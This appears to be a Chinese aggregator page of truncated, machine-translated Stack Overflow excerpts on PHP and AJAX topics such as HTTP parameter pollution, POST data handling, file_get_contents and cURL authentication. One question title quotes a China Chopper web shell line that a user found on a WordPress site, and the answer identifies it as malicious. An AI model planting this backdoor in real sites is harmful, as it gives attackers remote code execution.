草庐IT

$http-get-post

全部标签

php - HTTP参数污染

在我们正在开发的网站中,在进行安全检查后,我们发现了安全问题。该报告也包含HTTP参数污染漏洞。在网络上我可以找到什么是HPP?它如何注入(inject)等;但是我找不到如何避免此类问题。服务器语言是php。&我知道相同的参数可以重复&当有很多相同的参数时,php只考虑最后一个参数。但是做一些事情来避免这种风险是没有任何意义的。那么有人可以通过示例指导我如何避免HPP漏洞吗?提前致谢 最佳答案 请注意,我在这里描述的是“服务器端HPP”,但是,该漏洞有一个客户端版本。了解服务器端版本也有助于了解客户端版本。HPP是指您的应用程序向另

PHP - 包含带有 POST 数据的文件

我有一个获取POST数据的PHP文件。我目前通过jQuery中的AJAX运行此文件:$.post("myfile.php",{key:value});我想在另一个PHP脚本中运行同一个文件。这就是我想要实现的目标:"value"));?>我知道include函数不接受其他参数,那么有没有办法用POST变量包含另一个PHP文件? 最佳答案 $_POST超全局数组可写在PHP脚本中,因此: 关于PHP-包含带有POST数据的文件,我们在StackOverflow上找到一个类似的问题:

php - 我可以使用 file_get_contents 加载 css 吗?

取而代之的是:我想这样做:但出于某种原因,文本显示在文档中,但未应用样式。这是一个由两部分组成的问题:为什么这不起作用?这样做是不是一个坏主意? 最佳答案 这个问题是在我还是初级开发人员时发布的。我不知道Sass和其他更简单更好的方法来实现CSS中的变量。我也不知道浏览器缓存。JeremyKarlsson在评论中回答了这个问题。file_get_contents需要echo。 关于php-我可以使用file_get_contents加载css吗?,我们在StackOverflow上找到一

php - WordPress Admin : When placing a Custom Post Type as a submenu of a parent menu, 父菜单链接被 CPT 覆盖

我注册了一个自定义帖子类型,我不希望它有自己的菜单,而是想将它作为一个名为my-custom-parent-page.这是我的代码:register_post_type('my_custom_post_type',array('labels'=>array('name'=>__('Books','mcpt'),'singular_name'=>__('Book','mcpt'),),'supports'=>array('title','editor'),'show_ui'=>true,'show_in_nav_menus'=>false,'show_in_menu'=>'my-cust

javascript - 使用 POST 在 js 中保存裁剪后的图像

我刚开始使用cropit,但遇到了一些问题。我试图找到提交裁剪图像的最佳方式,但我发现即使在谷歌搜索时也很难找到明确的答案。到目前为止,这是我的想法:方式一从js获取位置,提交新位置并裁剪它,从新位置,我从js获取。方式二将裁剪图像的base64版本作为隐藏表单元素提交。恐怕我无法通过这种方式获得完整图像,因为预览(裁剪图像的地方)小于最终图像实际应有的尺寸。关于什么是获得裁剪图像的最佳方式有什么想法吗?$(function(){$('.image-editor').cropit({imageState:{src:'http://lorempixel.com/500/400/'}});

javascript - POST 数据在浏览器和 PHP 之间被 chop

我遇到了一个问题,即使用AJAX通过POST发送的大数据集没有进入PHP中的$_POST变量。用户通过网络表单上传Excel/CSV文件,并通过AJAX进行解析。这个特定示例有775条记录,每条记录有13个字段/元素。添加正在提交的其他字段,并且数据集中的元素少于11,000个。根据我对该主题所做的研究,32位浏览器(即Firefox、Chrome等)应该能够处理42.9亿个元素,因此我不认为数据大小是一个问题,尤其是作为响应从文件上传包含所有元素。只有在提交整个表单进行验证并输入数据库时​​,问题才会浮出水面。问题是Firebug和Chrome开发者工具上的控制台显示整个数据集已提交

$_GET 变量问题中的 PHP "&"字符

如何将“&”符号放入URLGET变量,使其成为字符串的一部分?问题是它总是将字符串拆分为下一个变量。我怎样才能让它工作?localhost/test.php?variable='jeans&shirts'//soitexecutesitlikeastring输出是'牛仔裤'而不是“牛仔裤和衬衫” 最佳答案 你会想urlencode()你的字符串://Yourlinkwouldlooklikethis:'localhost/test.php?variable='.urlencode('jeans&shirts');当你想使用它时,你会

php - 在 wordpress 站点中找到 <?php @eval($_POST ['pass' ]);?> 代码

我在我的一个wordpress插件站点中找到了这段代码。我想它可能会被恶意使用,但它到底做了什么,我能否查明它是否调用了一些我应该注意的其他操作? 最佳答案 此PHP脚本属于ChinaChopper黑客工具包。https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html 关于php-在wordpress站点中找到代码,我们在StackOv

PHP : file_get_contents with json_decode not working together

我在使用file_get_contents读取json文件后遇到问题。当我运行这段代码时,它工作正常:结果:沙查尔加诺当我运行这段代码时,它是空的:结果:****空——没有出现****当我运行这段代码时,检查file_get_contents是否正常工作:结果:[{"fullName":"ShacharGanot","address":"YadRambam","phoneNumber":"050-1231233","email":"","note":"","role":"","area":""},{"fullName":"BettyGanot","address":"Modiin","

php - HTTP Basic Auth 的编码密码字段

我使用PHPcURL与RestAPI通信。大多数功能是使用X-Ephemeral-Tokens执行的,但不幸的是,它们不允许通过这些授予删除权限,因此我必须实现一个通过HTTP基本身份验证删除的功能。我遇到的麻烦是测试帐户的密码是一个随机字符串,包括多个特殊字符(其中一些是双引号)。通过将username:password组合用单引号(即')括起来,我得到了使用普通cURL二进制文件的请求,但我不确定如何将其转换为PHP.相关片段如下。$curl=curl_init();curl_setopt($curl,CURLOPT_HTTPHEADER,array("Accept:applica